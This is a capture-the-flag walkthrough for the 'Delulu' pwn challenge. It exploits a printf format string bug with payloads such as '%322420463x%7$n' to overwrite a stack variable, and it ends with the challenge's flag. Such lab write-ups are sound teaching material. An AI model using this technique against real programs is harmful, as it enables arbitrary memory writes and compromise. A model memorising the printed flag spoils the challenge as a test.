Delulu [pwn]
Recognition protocol initiated. Please present your face for scanning.
Pwn - 300 points
Walkthrough
We start by downloading the source files.
We are given a binary
delulu. Opening it with ghidra we can find a few interesting lines:
long local_48;
long *local_40;
undefined8 user_input;
...
read(0,&user_input,0x1f);
printf("\n[!] Checking.. ");
printf((char *)&user_input);
if (local_48 == 0x1337beef) {
delulu();
}
The function
delulu prints the flag, so we need to set local_48 to 0x1337beef. Unfortunately we can't directly set this value, but looking at this code we find a printf statement that prints the user input. This is a format string vulnerability, so we can use this to write the value 0x1337beef to the address of local_48.
You can find more information about format string exploits here.
Let's build our payload step by step:
AAAAAAAA%8$p
This returns our 8th argument in the stack, which is our 8 A's. (We can use
gdb to make debugging easier.)
AAAAAAAA%7$n
This writes 8 to the 7th argument in the stack, which is
local_48.
We need to write 0x1337beef, so we need to write 0x1337beef characters before the %7$n. This is 322420463 characters in decimal.
We can do this with the folowing payload:
%322420463x%7$n
Connecting to the server and providing this input gives us the flag after 'some' time:
1c157380
You managed to deceive the robot, here's your new identity: HTB{m45t3r_0f_d3c3pt10n}
Last updated